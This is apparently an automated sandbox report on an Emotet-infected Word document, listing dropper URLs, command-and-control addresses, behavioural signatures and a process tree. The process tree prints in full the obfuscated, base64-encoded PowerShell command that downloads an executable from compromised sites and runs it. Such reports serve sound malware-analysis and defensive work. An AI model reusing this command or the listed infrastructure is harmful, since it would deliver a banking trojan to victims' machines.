Analysis

  • max time kernel
    23s
  • resource
    win10v191014
  • submitted
    15-01-2020 09:04

General

  • Target

    350d1479b76a0fc4a8a14435655b971e20c3c9b1c5f9f4724556239b9690b806

  • Sample

    200115-jsf5xw92na

  • SHA256

    350d1479b76a0fc4a8a14435655b971e20c3c9b1c5f9f4724556239b9690b806

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://www.hgklighting.com/wp-admin/g0bm/

exe.dropper

http://thegioilap.vn/wp-content/EV/

exe.dropper

http://pilkom.ulm.ac.id/wp-content/r4iio/

exe.dropper

http://165.227.220.53/wp-includes/YEQ4r/

exe.dropper

https://jelajahpulautidung.com/t4ierwnn/8j/

Extracted

Family

emotet

C2

66.7.242.50:8080

72.186.137.156:80

197.89.27.26:8080

91.250.96.22:8080

37.187.72.193:8080

104.131.44.150:8080

167.71.10.37:8080

78.24.219.147:8080

159.65.25.128:8080

95.128.43.213:8080

179.13.185.19:80

186.86.247.171:443

110.142.38.16:80

201.173.217.124:443

169.239.182.217:8080

211.63.71.72:8080

104.131.11.150:8080

190.55.181.54:443

209.146.22.34:443

64.53.242.181:8080

rsa_pubkey.plain

Signatures

  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Process spawned unexpected child process 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\350d1479b76a0fc4a8a14435655b971e20c3c9b1c5f9f4724556239b9690b806.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:4900
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABXAGUAbgBxAG8AagBtAHgAPQAnAE0AbQB5AGMAegB2AHoAbgBjACcAOwAkAFkAbQBoAHYAcAB5AHIAcABzAG8AdgB5AG8AIAA9ACAAJwA0ADQAOQAnADsAJABMAG8AbwB3AGUAYwB0AGUAPQAnAEcAbABiAHAAbgB4AHUAbwBtAHAAbwBtACcAOwAkAFoAbABpAHkAcAB4AHQAYgBuAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABZAG0AaAB2AHAAeQByAHAAcwBvAHYAeQBvACsAJwAuAGUAeABlACcAOwAkAFMAbQBzAHMAdwBsAG0AZwBvAHUAPQAnAEIAcwBlAGoAZABwAHYAcwBnAG4AYQBrAGkAJwA7ACQASgBmAG8AbQBsAGgAdgBvAGMAZgA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBlAHQALgBXAGUAYgBjAEwASQBFAG4AdAA7ACQAUgBlAGMAZABpAGYAdAB0AHYAawA9ACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AaABnAGsAbABpAGcAaAB0AGkAbgBnAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBnADAAYgBtAC8AKgBoAHQAdABwADoALwAvAHQAaABlAGcAaQBvAGkAbABhAHAALgB2AG4ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ARQBWAC8AKgBoAHQAdABwADoALwAvAHAAaQBsAGsAbwBtAC4AdQBsAG0ALgBhAGMALgBpAGQALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AcgA0AGkAaQBvAC8AKgBoAHQAdABwADoALwAvADEANgA1AC4AMgAyADcALgAyADIAMAAuADUAMwAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAFkARQBRADQAcgAvACoAaAB0AHQAcABzADoALwAvAGoAZQBsAGEAagBhAGgAcAB1AGwAYQB1AHQAaQBkAHUAbgBnAC4AYwBvAG0ALwB0ADQAaQBlAHIAdwBuAG4ALwA4AGoALwAnAC4AIgBTAHAAYABMAEkAVAAiACgAJwAqACcAKQA7ACQATgB6AHoAbgB6AG0AYwBlAHIAagBiAGkAPQAnAFoAdwBoAHcAbwB3AGMAagBjACcAOwBmAG8AcgBlAGEAYwBoACgAJABUAHgAbQB3AGEAawBiAGsAZwBkAG4AbgB0ACAAaQBuACAAJABSAGUAYwBkAGkAZgB0AHQAdgBrACkAewB0AHIAeQB7ACQASgBmAG8AbQBsAGgAdgBvAGMAZgAuACIARABgAG8AYABXAE4AbABPAEEAYABkAGYASQBsAGUAIgAoACQAVAB4AG0AdwBhAGsAYgBrAGcAZABuAG4AdAAsACAAJABaAGwAaQB5AHAAeAB0AGIAbgApADsAJABRAGoAZgBlAGwAaQBrAHUAcgB5AGgAbwBnAD0AJwBZAG4AbQB6AGIAaAB1AGwAZwBxACcAOwBJAGYAIAAoACgAJgAoACcARwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQAWgBsAGkAeQBwAHgAdABiAG4AKQAuACIAbABlAGAATgBHAGAAVABIACIAIAAtAGcAZQAgADMANQAzADIAMwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYQBgAFIAVAAiACgAJABaAGwAaQB5AHAAeAB0AGIAbgApADsAJABHAHEAZQB3AG4AbwBpAGQAdwB6AGYAYgA9ACcASgBpAHMAaABhAGQAYgB4AG8AdwBkACcAOwBiAHIAZQBhAGsAOwAkAFcAeAB6AG8AcwB2AHEAbwBiAHUAawBiAD0AJwBKAGIAbwBnAHkAawBzAGsAZABuACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEoAcgBpAGMAaABzAGQAdwBtAGYAeABrAD0AJwBBAGEAaQBvAGgAZwBpAHMAcwAnAA==
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Process spawned unexpected child process
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3716
    • C:\Users\Admin\449.exe
      "C:\Users\Admin\449.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1672
      • C:\Users\Admin\449.exe
        --2d12e597
        3⤵
        • Suspicious behavior: EmotetMutantsSpam
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        PID:4664

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1672-6-0x0000000002290000-0x00000000022A7000-memory.dmp

    Filesize

    92KB

  • memory/4664-9-0x00000000005E0000-0x00000000005F7000-memory.dmp

    Filesize

    92KB

  • memory/4664-10-0x0000000000400000-0x0000000000469000-memory.dmp

    Filesize

    420KB